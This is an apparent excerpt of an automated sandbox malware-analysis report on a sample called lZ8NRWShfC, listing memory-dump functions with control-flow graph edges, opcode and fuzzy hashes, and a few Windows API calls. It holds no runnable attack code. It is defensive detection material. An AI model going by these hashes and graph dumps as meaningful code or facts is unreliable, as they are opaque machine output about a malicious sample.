                        control_flow_graph 1595 63b056a-63b056b 1596 63b056d-63b057f 1595->1596 1597 63b0555-63b0557 1595->1597 1601 63b0a6a-63b0a99 1596->1601 1602 63b0585-63b0589 1596->1602 1598 63b00ab-63b00b8 1597->1598 1603 63b00be-63b00d5 1598->1603 1604 63b0734-63b073d 1598->1604 1608 63b0aa0-63b0acf 1601->1608 1605 63b058f-63b0599 1602->1605 1606 63b0ad6-63b0cfb 1602->1606 1603->1598 1614 63b00d7 1603->1614 1607 63b059f-63b05cd 1605->1607 1605->1608 1607->1598 1607->1601 1608->1606 1617 63b03fa-63b0428 1614->1617 1618 63b0298-63b02bb 1614->1618 1619 63b00de 1614->1619 1620 63b030e-63b0331 1614->1620 1621 63b01ac-63b01cf 1614->1621 1622 63b0222-63b0250 1614->1622 1623 63b0470-63b049e 1614->1623 1624 63b0144-63b01a7 1614->1624 1625 63b0384-63b03a7 1614->1625 1654 63b042a-63b0430 1617->1654 1655 63b0440-63b046b 1617->1655 1673 63b07e2-63b0811 1618->1673 1674 63b02c1-63b02c5 1618->1674 1638 63b00e8-63b0104 1619->1638 1678 63b0337-63b033b 1620->1678 1679 63b0884-63b08b3 1620->1679 1675 63b0740-63b076f 1621->1675 1676 63b01d5-63b01d9 1621->1676 1650 63b0268-63b0293 1622->1650 1651 63b0252-63b0258 1622->1651 1652 63b04a0-63b04a6 1623->1652 1653 63b04b6-63b04e1 1623->1653 1624->1598 1671 63b03ad-63b03b1 1625->1671 1672 63b0926-63b0955 1625->1672 1649 63b010a-63b013f 1638->1649 1649->1598 1650->1598 1657 63b025a 1651->1657 1658 63b025c-63b025e 1651->1658 1659 63b04aa-63b04ac 1652->1659 1660 63b04a8 1652->1660 1653->1598 1666 63b0432 1654->1666 1667 63b0434-63b0436 1654->1667 1655->1598 1657->1650 1658->1650 1659->1653 1660->1653 1666->1655 1667->1655 1684 63b0992-63b0a63 1671->1684 1685 63b03b7-63b03c1 1671->1685 1697 63b095c-63b098b 1672->1697 1701 63b0818-63b0847 1673->1701 1686 63b02cb-63b02d5 1674->1686 1687 63b084e-63b087d 1674->1687 1704 63b0776-63b07a5 1675->1704 1688 63b01df-63b01e9 1676->1688 1689 63b07ac-63b07db 1676->1689 1680 63b0341-63b034b 1678->1680 1681 63b08f0-63b091f 1678->1681 1692 63b08ba-63b08e9 1679->1692 1680->1692 1693 63b0351-63b037f 1680->1693 1681->1672 1684->1601 1685->1697 1698 63b03c7-63b03f5 1685->1698 1700 63b02db-63b0309 1686->1700 1686->1701 1687->1679 1703 63b01ef-63b021d 1688->1703 1688->1704 1689->1673 1692->1681 1693->1598 1697->1684 1698->1598 1700->1598 1701->1687 1703->1598 1704->1689
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1890939572.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_63b0000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID: Ta$la$a
                        • API String ID: 0-3399653266
                        • Opcode ID: e4781de3164e41da807018f58891de60203b9bccf5f7b922e40880d5309c786e
                        • Instruction ID: db8f246009c2fc9d53ca1125d1958476c8b304e8a3be1d07ab76568aa49de5fa
                        • Opcode Fuzzy Hash: e4781de3164e41da807018f58891de60203b9bccf5f7b922e40880d5309c786e
                        • Instruction Fuzzy Hash: CF027A30B007249FCB149F68D441AAE7BF6FF85705F009948E606AF7A5CBB5E9458BC2
                        Function 063B05E0 Relevance: 4.2, Strings: 3, Instructions: 428COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2003 63b05e0-63b05e1 2004 63b05cb-63b05cd 2003->2004 2005 63b05e3-63b05f5 2003->2005 2006 63b00ab-63b00b8 2004->2006 2009 63b05fb-63b05ff 2005->2009 2010 63b0b0c-63b0b3b 2005->2010 2011 63b00be-63b00d5 2006->2011 2012 63b0734-63b073d 2006->2012 2013 63b0b78-63b0cfb 2009->2013 2014 63b0605-63b060f 2009->2014 2016 63b0b42-63b0b71 2010->2016 2011->2006 2021 63b00d7 2011->2021 2014->2016 2017 63b0615-63b0643 2014->2017 2016->2013 2017->2006 2017->2010 2025 63b03fa-63b0428 2021->2025 2026 63b0298-63b02bb 2021->2026 2027 63b00de 2021->2027 2028 63b030e-63b0331 2021->2028 2029 63b01ac-63b01cf 2021->2029 2030 63b0222-63b0250 2021->2030 2031 63b0470-63b049e 2021->2031 2032 63b0144-63b01a7 2021->2032 2033 63b0384-63b03a7 2021->2033 2063 63b042a-63b0430 2025->2063 2064 63b0440-63b046b 2025->2064 2081 63b07e2-63b0811 2026->2081 2082 63b02c1-63b02c5 2026->2082 2046 63b00e8-63b0104 2027->2046 2087 63b0337-63b033b 2028->2087 2088 63b0884-63b08b3 2028->2088 2083 63b0740-63b076f 2029->2083 2084 63b01d5-63b01d9 2029->2084 2058 63b0268-63b0293 2030->2058 2059 63b0252-63b0258 2030->2059 2060 63b04a0-63b04a6 2031->2060 2061 63b04b6-63b04e1 2031->2061 2032->2006 2079 63b03ad-63b03b1 2033->2079 2080 63b0926-63b0955 2033->2080 2057 63b010a-63b013f 2046->2057 2057->2006 2058->2006 2066 63b025a 2059->2066 2067 63b025c-63b025e 2059->2067 2068 63b04aa-63b04ac 2060->2068 2069 63b04a8 2060->2069 2061->2006 2074 63b0432 2063->2074 2075 63b0434-63b0436 2063->2075 2064->2006 2066->2058 2067->2058 2068->2061 2069->2061 2074->2064 2075->2064 2093 63b0992-63b0b05 2079->2093 2094 63b03b7-63b03c1 2079->2094 2105 63b095c-63b098b 2080->2105 2109 63b0818-63b0847 2081->2109 2095 63b02cb-63b02d5 2082->2095 2096 63b084e-63b087d 2082->2096 2112 63b0776-63b07a5 2083->2112 2097 63b01df-63b01e9 2084->2097 2098 63b07ac-63b07db 2084->2098 2089 63b0341-63b034b 2087->2089 2090 63b08f0-63b091f 2087->2090 2100 63b08ba-63b08e9 2088->2100 2089->2100 2101 63b0351-63b037f 2089->2101 2090->2080 2093->2010 2094->2105 2106 63b03c7-63b03f5 2094->2106 2108 63b02db-63b0309 2095->2108 2095->2109 2096->2088 2111 63b01ef-63b021d 2097->2111 2097->2112 2098->2081 2100->2090 2101->2006 2105->2093 2106->2006 2108->2006 2109->2096 2111->2006 2112->2098
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1890939572.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_63b0000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID: $a$la$a
                        • API String ID: 0-2993436324
                        • Opcode ID: 7363378301524e78f5efcca4c1575473e29057912addb56b79bb775c59f4c1d7
                        • Instruction ID: f45a39ebdb37e27184b89c9687f72cb7b2ec7bbc642578a51aab89aebeb27b73
                        • Opcode Fuzzy Hash: 7363378301524e78f5efcca4c1575473e29057912addb56b79bb775c59f4c1d7
                        • Instruction Fuzzy Hash: 9B027A30B003149FCB149F68C841AAE7BF6FF85705F109949E606AF7A5CBB5E9458BC2
                        Function 063B0656 Relevance: 4.1, Strings: 3, Instructions: 390COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2202 63b0656-63b0657 2203 63b0659-63b066b 2202->2203 2204 63b0641-63b0643 2202->2204 2206 63b0bae-63b0bdd 2203->2206 2207 63b0671-63b0675 2203->2207 2205 63b00ab-63b00b8 2204->2205 2214 63b00be-63b00d5 2205->2214 2215 63b0734-63b073d 2205->2215 2211 63b0be4-63b0c13 2206->2211 2208 63b067b-63b0685 2207->2208 2209 63b0c1a-63b0cfb 2207->2209 2210 63b068b-63b06b9 2208->2210 2208->2211 2210->2205 2211->2209 2214->2205 2224 63b00d7 2214->2224 2226 63b03fa-63b0428 2224->2226 2227 63b0298-63b02bb 2224->2227 2228 63b00de 2224->2228 2229 63b030e-63b0331 2224->2229 2230 63b01ac-63b01cf 2224->2230 2231 63b0222-63b0250 2224->2231 2232 63b0470-63b049e 2224->2232 2233 63b0144-63b01a7 2224->2233 2234 63b0384-63b03a7 2224->2234 2261 63b042a-63b0430 2226->2261 2262 63b0440-63b046b 2226->2262 2280 63b07e2-63b0811 2227->2280 2281 63b02c1-63b02c5 2227->2281 2245 63b00e8-63b0104 2228->2245 2285 63b0337-63b033b 2229->2285 2286 63b0884-63b08b3 2229->2286 2282 63b0740-63b076f 2230->2282 2283 63b01d5-63b01d9 2230->2283 2257 63b0268-63b0293 2231->2257 2258 63b0252-63b0258 2231->2258 2259 63b04a0-63b04a6 2232->2259 2260 63b04b6-63b04e1 2232->2260 2233->2205 2278 63b03ad-63b03b1 2234->2278 2279 63b0926-63b0955 2234->2279 2256 63b010a-63b013f 2245->2256 2256->2205 2257->2205 2264 63b025a 2258->2264 2265 63b025c-63b025e 2258->2265 2266 63b04aa-63b04ac 2259->2266 2267 63b04a8 2259->2267 2260->2205 2273 63b0432 2261->2273 2274 63b0434-63b0436 2261->2274 2262->2205 2264->2257 2265->2257 2266->2260 2267->2260 2273->2262 2274->2262 2291 63b0992-63b0ba7 2278->2291 2292 63b03b7-63b03c1 2278->2292 2304 63b095c-63b098b 2279->2304 2308 63b0818-63b0847 2280->2308 2293 63b02cb-63b02d5 2281->2293 2294 63b084e-63b087d 2281->2294 2311 63b0776-63b07a5 2282->2311 2296 63b01df-63b01e9 2283->2296 2297 63b07ac-63b07db 2283->2297 2287 63b0341-63b034b 2285->2287 2288 63b08f0-63b091f 2285->2288 2299 63b08ba-63b08e9 2286->2299 2287->2299 2300 63b0351-63b037f 2287->2300 2288->2279 2291->2206 2292->2304 2305 63b03c7-63b03f5 2292->2305 2307 63b02db-63b0309 2293->2307 2293->2308 2294->2286 2310 63b01ef-63b021d 2296->2310 2296->2311 2297->2280 2299->2288 2300->2205 2304->2291 2305->2205 2307->2205 2308->2294 2310->2205 2311->2297
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1890939572.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_63b0000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID: <a$la$a
                        • API String ID: 0-2827948075
                        • Opcode ID: e774dcbc42d2d2a718fd72b4306e369fd381f458347da7958a3f7cbf8aec55c3
                        • Instruction ID: f6b6339f3f5789a6bfb8dffeca6e839c62bf4f2488102874aace279f5e64fac5
                        • Opcode Fuzzy Hash: e774dcbc42d2d2a718fd72b4306e369fd381f458347da7958a3f7cbf8aec55c3
                        • Instruction Fuzzy Hash: 44F17930B002149FDB14DF68C841AAE7BF6FF85705F109549E6069F7A5CBB2E9498BC1
                        Function 063B0048 Relevance: 3.2, Strings: 2, Instructions: 665COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1890939572.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_63b0000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID: la$a
                        • API String ID: 0-644286645
                        • Opcode ID: 74cf970fe61e43809d57984c791f173c69f710157b7aef361cb4ea2a8973eb59
                        • Instruction ID: 1bb2831cf8155b950acc1a5f38defd4ba158449a150923af755a8ab010435f46
                        • Opcode Fuzzy Hash: 74cf970fe61e43809d57984c791f173c69f710157b7aef361cb4ea2a8973eb59
                        • Instruction Fuzzy Hash: E44257307007248FCB24AF78D450A6FBAF6FFC5702B409A4CD506AB795CB75A9468BC2
                        Function 063B04F4 Relevance: 3.0, Strings: 2, Instructions: 500COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1890939572.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_63b0000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID: la$a
                        • API String ID: 0-644286645
                        • Opcode ID: 25face2074eef5bb0816896006a0b5e9d9bc1b645b0fcd3e1aaa9387abd5737d
                        • Instruction ID: 87d6f68708f926f862d959c80aaae7d173546e4ca10f617427c7e2b2887632cd
                        • Opcode Fuzzy Hash: 25face2074eef5bb0816896006a0b5e9d9bc1b645b0fcd3e1aaa9387abd5737d
                        • Instruction Fuzzy Hash: 0C128A30B007249FCB149F68D441AAE7BF6FF85705F009948E506AF7A5CBB5E9458BC2
                        Function 063B06CC Relevance: 2.9, Strings: 2, Instructions: 356COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1890939572.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_63b0000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID: la$a
                        • API String ID: 0-644286645
                        • Opcode ID: 48e848698788c6c92a577ee7878781a1817acc18174545ec4197f5c34345c97a
                        • Instruction ID: e2428dd69e2adfe3a004797638ec7771b3a1168743939d38d768211c3ab28332
                        • Opcode Fuzzy Hash: 48e848698788c6c92a577ee7878781a1817acc18174545ec4197f5c34345c97a
                        • Instruction Fuzzy Hash: 5CE17930B002149FDB449F64C845AAE7BF6FF84704F109459E6029F7A6CBB2E949CBD1
                        Function 063B0002 Relevance: 2.8, Strings: 2, Instructions: 346COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1890939572.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_63b0000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID: la$a
                        • API String ID: 0-644286645
                        • Opcode ID: 3a002f4656b09bc4a89dec4351f12f2960dfffeb496e29f2784aac558825c1f7
                        • Instruction ID: e181d276fdbcb5683109734b6d4c8a6f0a77c2f12fe2415d6350897dc763ff63
                        • Opcode Fuzzy Hash: 3a002f4656b09bc4a89dec4351f12f2960dfffeb496e29f2784aac558825c1f7
                        • Instruction Fuzzy Hash: A8D1AB30B013449FDB058F64C856AAE7BF6EF89700F14909AE6019F7A2CBB1D949CBD1
                        Function 063675E8 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,063674A6), ref: 06367656
                        Memory Dump Source
                        • Source File: 00000008.00000002.1890829139.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6360000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 1eaa93c597d57781be269ce25e8ebd4975c5ed8b8d2e98f0cc0af10303938f82
                        • Instruction ID: 48c4ca3387433fcf6b76ffedafddafa38afacfade773f9ddbe963aca0e3bf23d
                        • Opcode Fuzzy Hash: 1eaa93c597d57781be269ce25e8ebd4975c5ed8b8d2e98f0cc0af10303938f82
                        • Instruction Fuzzy Hash: D91126B5C003499FDB10DFAAD844ADFFBF8EB88324F10841AE419A7610D374A546CFA5
                        Function 06367148 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,063674A6), ref: 06367656
                        Memory Dump Source
                        • Source File: 00000008.00000002.1890829139.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6360000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 9e85c52bf66b6487b6d696090f0af385ae57580a9803da62c45b1d292851f7a8
                        • Instruction ID: e3af8f7747478df0cc07c9fec00bf50db4476b8820e1c90707fcaa6b4bd58ea2
                        • Opcode Fuzzy Hash: 9e85c52bf66b6487b6d696090f0af385ae57580a9803da62c45b1d292851f7a8
                        • Instruction Fuzzy Hash: DC1123B5C003498FDB10DF9AC844A9EFBF4EB88324F54842AE419B7211D375A545CFA5
                        Function 01060CE0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                        Download Yara Rule
                        APIs
                        • GetConsoleWindow.KERNELBASE ref: 01060D47
                        Memory Dump Source
                        • Source File: 00000008.00000002.1874008817.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1060000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: ConsoleWindow
                        • String ID:
                        • API String ID: 2863861424-0
                        • Opcode ID: 06c83971e982e278921641023df9bc7221e6909613816e35d0efd1441a1beff4
                        • Instruction ID: 6e688baab2d76710c77df7fee9c93781941be679155f11f45a5024d561ee6129
                        • Opcode Fuzzy Hash: 06c83971e982e278921641023df9bc7221e6909613816e35d0efd1441a1beff4
                        • Instruction Fuzzy Hash: 171155B19003488FCB20DFAAC4457DFFFF4EB88320F20845AD559A7240CB35A945CBA0
                        Function 01060CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • GetConsoleWindow.KERNELBASE ref: 01060D47
                        Memory Dump Source
                        • Source File: 00000008.00000002.1874008817.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1060000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID: ConsoleWindow
                        • String ID:
                        • API String ID: 2863861424-0
                        • Opcode ID: 80ab8337aefd469e06732e37f91b1e8b50176f59544e61fd17bfded90214831c
                        • Instruction ID: 9ee3ed5307e678092273d8aeaa56642f6565f068dd0fe59dccd9fd971b8e6145
                        • Opcode Fuzzy Hash: 80ab8337aefd469e06732e37f91b1e8b50176f59544e61fd17bfded90214831c
                        • Instruction Fuzzy Hash: 101136B19003098FCB24DFAAC4457DFFFF4EB88324F20841AD559A7240CB35A544CBA5
                        Function 063B3424 Relevance: 1.3, Instructions: 1322COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1890939572.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_63b0000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dc7ed27eef53d615fee37f0e99668766c307e6bbccdde82f70ac510a8404bb27
                        • Instruction ID: 170a158e7c16a1e12c73f5cde69164a3e351b1353e23f5857ee4f9530bd8b815
                        • Opcode Fuzzy Hash: dc7ed27eef53d615fee37f0e99668766c307e6bbccdde82f70ac510a8404bb27
                        • Instruction Fuzzy Hash: A1C1C574B002149FDB45CF68C895AAEBBF6EF88300B1194AAE605DB7A1DB70DC05CB91
                        Function 063B1308 Relevance: .2, Instructions: 204COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1890939572.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_63b0000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b4a8dee463912c1ac4d4899a4016ec309acd921c1815e0a7ac8f6fe1adc65000
                        • Instruction ID: 3f631c99fa445e52dbdf85e2a7a92aaaae311ffe4c2e568f06c7fc3709758aa5
                        • Opcode Fuzzy Hash: b4a8dee463912c1ac4d4899a4016ec309acd921c1815e0a7ac8f6fe1adc65000
                        • Instruction Fuzzy Hash: DB613836B043458FCB549F79D8604BABBF5AFC1311B18856BDA09CBA50EB31C849C7E1
                        Function 063B3327 Relevance: .1, Instructions: 84COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1890939572.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_63b0000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ba088275656687dbc1b96a23df7c58f9e4132c6269b906780e44167aa11be9bb
                        • Instruction ID: b7c66af672783fd41715b632134bc7f93ff842ea79c3287432f6bf82895bcebd
                        • Opcode Fuzzy Hash: ba088275656687dbc1b96a23df7c58f9e4132c6269b906780e44167aa11be9bb
                        • Instruction Fuzzy Hash: 7C315E75B401149FDB54CF68D884DAEBBB2FF88714F1680A4EA099F762DA31EC05CB90
                        Function 00E0D054 Relevance: .1, Instructions: 77COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1871305559.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_e0d000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5b523492bfb518209040b55b776a5b290fa7711ef2bee3ca59d751735fc5c500
                        • Instruction ID: 7d859e13fcb7eb55108da533c839ee49e3292f4ea157da18462a4e811e51d69e
                        • Opcode Fuzzy Hash: 5b523492bfb518209040b55b776a5b290fa7711ef2bee3ca59d751735fc5c500
                        • Instruction Fuzzy Hash: ED213671508200EFCB05DF94DCC0B26BFA6FB88314F24C668E9091B286C336D856CBA1
                        Function 00E1D4A4 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1871378649.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_e1d000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7f010842a602e41279c3062dd54ee395f242d52760fba265f5f99f09f52877d7
                        • Instruction ID: 0e572e0820f67805d9eef0672135ea5638dd80b95905377d9747d2185f96fe6b
                        • Opcode Fuzzy Hash: 7f010842a602e41279c3062dd54ee395f242d52760fba265f5f99f09f52877d7
                        • Instruction Fuzzy Hash: C52107B1608204EFCB05DF14D9C4B65BBA6FB94318F24C66DD90A5B352C736D886CB61
                        Function 00E1D2F4 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1871378649.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_e1d000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 18c084b6d91fbab6400dc52c53572ff3e21e5f71c918a1c824198a325a02358a
                        • Instruction ID: 859c3d6bd371ca4128d3a7a9a48f646cab6832cb979f4d116bd6570ac6cdda7e
                        • Opcode Fuzzy Hash: 18c084b6d91fbab6400dc52c53572ff3e21e5f71c918a1c824198a325a02358a
                        • Instruction Fuzzy Hash: 16213BB1608304DFCB01DF14DCC4B5ABB65FB94324F24C669D8195B345C33AD886C6A2
                        Function 00E0D04F Relevance: .1, Instructions: 58COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1871305559.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_e0d000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 85e589ff89d53fefa928555ed391731ad88d74b974b24a20ba51987b010bfd2c
                        • Instruction ID: 99af64ac69f013d74eddbde7e37ce6586ebe028110445ea4e9d3d0cdbc5224ee
                        • Opcode Fuzzy Hash: 85e589ff89d53fefa928555ed391731ad88d74b974b24a20ba51987b010bfd2c
                        • Instruction Fuzzy Hash: 4621DF76504280DFCF06CF40D9C4B16BF72FB88318F24C2A9E9491B296C33AD866CB91
                        Function 00E1D2EF Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1871378649.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_e1d000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 118f051af2fa4d3b71157da4c1d703aecab942a5cdb4903c1e78cbe3821e71d1
                        • Instruction ID: 5b479ad54b99d6ce399f9222dda51185b970cb25f817bdfd8c53895a6c1edafb
                        • Opcode Fuzzy Hash: 118f051af2fa4d3b71157da4c1d703aecab942a5cdb4903c1e78cbe3821e71d1
                        • Instruction Fuzzy Hash: 2811C475508280CFDB11CF14D9C4B59FF71FB84324F24C6AAD8495B656C33AD84ACBA2
                        Function 00E1D49F Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1871378649.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_e1d000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                        • Instruction ID: 505a52b0cca41751a3a34b818d045157e5350cc6cdb014a7b67980da534272c6
                        • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                        • Instruction Fuzzy Hash: 6B11D075508240CFCB02CF14C9C4B15BF72FB84328F24C6ADD8494B652C33AD84ACB51
                        Function 00E0DAD1 Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1871305559.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_e0d000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9581b67dc62b90d13ffc3fa12a2bcef6979fafc1abf659e57b510e6e6d66bd5e
                        • Instruction ID: 7e39e36ab1170471518eaeb896394800460f6fe3e53f76dedc07fdea2bfef5d6
                        • Opcode Fuzzy Hash: 9581b67dc62b90d13ffc3fa12a2bcef6979fafc1abf659e57b510e6e6d66bd5e
                        • Instruction Fuzzy Hash: 5601F77110C344AAE7208A99CC84B66BFE8DF60365F18C419EC0D2A2C2C6749880CB71
                        Function 00E0DAD0 Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1871305559.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_e0d000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fee193a14aa2af2e03eebd26d2a2516c0b2d86c806939522fd2a661baafe63b0
                        • Instruction ID: 7d584795429d987ceadecc11c741adc06e0ead7c788d0c34e03af1d1af94e5cc
                        • Opcode Fuzzy Hash: fee193a14aa2af2e03eebd26d2a2516c0b2d86c806939522fd2a661baafe63b0
                        • Instruction Fuzzy Hash: 6DF0C272408344AAE7208A4ACC84B62FF98EF60334F18C05AED0C1E2C2C2789884CB71

                        Non-executed Functions

                        Function 063B1536 Relevance: 10.3, Strings: 8, Instructions: 329COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1890939572.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_63b0000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
                        • String ID: $]$<]$D[$L\$T]$d\$l]$|\
                        • API String ID: 0-1079412102
                        • Opcode ID: 983cf75c0d259fff725dc77f55df77ffe64defd287006333a66194408f856bf7
                        • Instruction ID: 0b4fa036af64a50a855990b9dad3502e2326a19611c3268032f787a89678bbf5
                        • Opcode Fuzzy Hash: 983cf75c0d259fff725dc77f55df77ffe64defd287006333a66194408f856bf7
                        • Instruction Fuzzy Hash: 8BC12A35B10604EFCB04DF58C995E9DBBB2FF89700B909059EA05EB7A1C672EC44CB95
                        Function 063B0D50 Relevance: 10.3, Strings: 8, Instructions: 293COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1890939572.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_63b0000_lZ8NRWShfC.jbxd
                        Similarity
                        • API ID:
